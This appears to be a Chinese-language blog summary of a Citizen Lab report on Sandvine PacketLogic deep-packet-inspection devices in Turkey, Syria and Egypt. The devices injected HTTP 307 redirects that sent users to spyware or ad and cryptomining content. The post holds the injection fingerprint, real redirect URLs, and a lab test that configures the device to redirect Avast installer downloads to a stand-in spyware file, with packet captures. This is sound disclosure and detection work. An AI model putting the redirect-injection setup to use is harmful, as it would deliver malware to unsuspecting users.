主要調查結果
-
透過Internet掃描,我們在土耳其的網路上發現了深度封包檢測(DPI)設備。當這些用戶試圖下載某些合法的Windows應用程式時,封包被用於土耳其和敘利亞的數百名用戶重新導向到國家間諜軟體。
-
我們在埃及電信網路找到了類似的設備。在很多情況下,顯然被用來大規模劫持埃及網路用戶的未加密網路連接,並將用戶重導向到會員廣告和瀏覽器加密貨幣挖掘腳本等創造營收內容。
-
經過廣泛調查後,我們將土耳其和埃及的網路注入特徵與PacketLogic設備進行了匹配。我們為在土耳其,敘利亞和埃及發現的注入特徵,並將特徵與我們在實驗室環境中採購和測量的二手PacketLogic設備相匹配。
-
Sandvine設備明顯用於暗中為土耳其,敘利亞和埃及的用戶注入惡意和可疑的重導向引發了重大的人權問題。
2017年9月的一份報告顯示,當用戶試圖下載流行的Windows應用程序時,土耳其,敘利亞的ISP可能將FinFisher間諜軟件注入到目標用戶的網際網路連接中。該注入是使用以下所示格式匹配的HTTP重導向實現的。
HTTP/1.1
307 Temporary Redirect
Location:
[location]
Connection:
close
我們在2017年10月掃描了網際網路,向每個IPv4地址發送一個HTTP請求以下載Opera
Web
Browser,這是2017年9月報告指出的針對間諜軟體注入的應用之一。我們最初的掃描在土耳其上發現了幾十個IP地址,它們返回了307個重導向,如下。
HTTP/1.1
307 Temporary Redirect
Location:
https://downloading.internetdownloading.co/down.php?a=2ec8a93a73540467335f4365beee7e44
Connection:
close
HTTP/1.1
307 Temporary Redirect
Location:
https://downloading.syriantelecom.co/pcdownload.php?a=20755b98d7c094747b75b157413e3422
Connection:
close
我們使用VPN成功從土耳其IP地址獲取文件。當我們試圖從非土耳其IP獲取文件時,我們收到了503服務暫時不可用的消息。這些文件與StrongPity間諜軟件類似。
我們繼續對土耳其進行掃描,並著手指定執行間諜軟體注入的設備。作為我們掃描的一部分,我們獲得了顯示間諜軟體注入的網路的詳細訊息的封包捕獲(PCAP)文件。
根據我們的PCAP文件,我們確定了土耳其注入網路的幾個要素,這些要素結合在一起形成了我們認為是極具特色的特徵:
-
在所有注入的封包中,對於所有注入的封包,IPID 都是13330 (0x3412,which is 0x1234 endian-swapped)。這個值是不尋常的,因為IPID通常是遞增或是隨機生成的,並且不是固定值。
-
在所有封包中,IP標誌都是零。由於TCP堆疊通常默認啟用TCP的路徑MTU發現,導致“不分段”IP標記被設置為1,此特性並不常見。
-
客戶端收到的注入封包是一個空的RST封包或FIN封包,其中HTTP頭部重導向,與先前中的重導向形式完全一致。
-
如果注入了FIN封包,則注入器在約100ms後向客戶端發送未經請求的最終ACK分組。這種行為是不常見的,因為在發送最終ACK之前,正常的TCP堆疊將先等待來自客戶端的FIN封包。
-
考慮到在土耳其安裝PacketLogic設備的爭議,我們購買了PacketLogic設備,以確認其行為是否符合我們的特徵。
將用戶重定向到惡意文件
我們添加了一條規則,將請求安裝Avast
Antivirus安裝文件的用戶重導向到惡意文件。此測試涉及創建一個PropertyObject,以匹配URL以Avast
Antivirus的文件名結尾的請求:avast_free_antivirus_setup_online.exe,然後過濾規則將所有匹配PropertyObject的連接重導向到惡意文件。該重導向使用了內置的注入操作。PacketLogic
GUI有一個“插入307臨時重導向”按鈕,按下該按鈕時,將粘貼與我們特徵的元素相同的HTTP
307臨時重導向響應。PacketLogic操作員可以配置“位置”標題,該標題最初是空白的;
在這種情況下,我們輸入了:http://example.com/spyware.exe。
我們的客戶端PCAP的摘錄,它捕獲了我們測試PacketLogic設備的注入。請注意,兩個注入的封包中的IPID均為13330,兩個注入的封包都沒有IP標記,HTTP
307重導向的格式是我們所期望的,並且最終的ACK數據包是未經請求的。
Client
sends GET request for Avast file
17:28:25.024018
IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6),
length 170)
192.168.1.27.49458
> 192.168.1.26.8080: Flags [P.], seq 1:119, ack 1, win 4117,
options [nop,nop,TS val 756363711 ecr 2094486068], length 118: HTTP,
length: 118
GET
/avast_free_antivirus_setup_online.exe HTTP/1.1
Host:
192.168.1.26:8080
User-Agent:
curl/7.54.0
Accept:
*/*
Client
receives injected data (redirect to spyware file)
17:28:25.024300
IP (tos 0x0, ttl 64, id 13330, offset 0, flags [none], proto TCP (6),
length 134)
192.168.1.26.8080
> 192.168.1.27.49458: Flags [F.], seq 1:95, ack 119, win 32120,
length 94: HTTP, length: 94
HTTP/1.1
307 Temporary Redirect
Location:
http://example.com/spyware.exe
Connection:
close
Client
receives injected ACK
17:28:25.024302
IP (tos 0x0, ttl 64, id 13330, offset 0, flags [none], proto TCP (6),
length 40)
192.168.1.26.8080
> 192.168.1.27.49458: Flags [.], seq 96, ack 120, win 32120,
length 0
我們服務器端PCAP的摘錄,它捕獲了我們測試PacketLogic設備的注入。需要注意的是在服務器端也沒有收到對Avast的文件HTTP請求。相反,它收到一個IPID為13330的注入RST封包,並且沒有標誌。請注意,PCAP文件中的時間戳差異是因為服務器和客戶端時鐘未同步。
Server
receives injected RST
17:28:06.715257
IP (tos 0x0, ttl 64, id 13330, offset 0, flags [none], proto TCP (6),
length 40)
192.168.1.27.49458
> 192.168.1.26.8080: Flags [R], seq 681001116, win 32120, length 0
其他的請參閱公民實驗室的報告
https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/
沒有留言:
張貼留言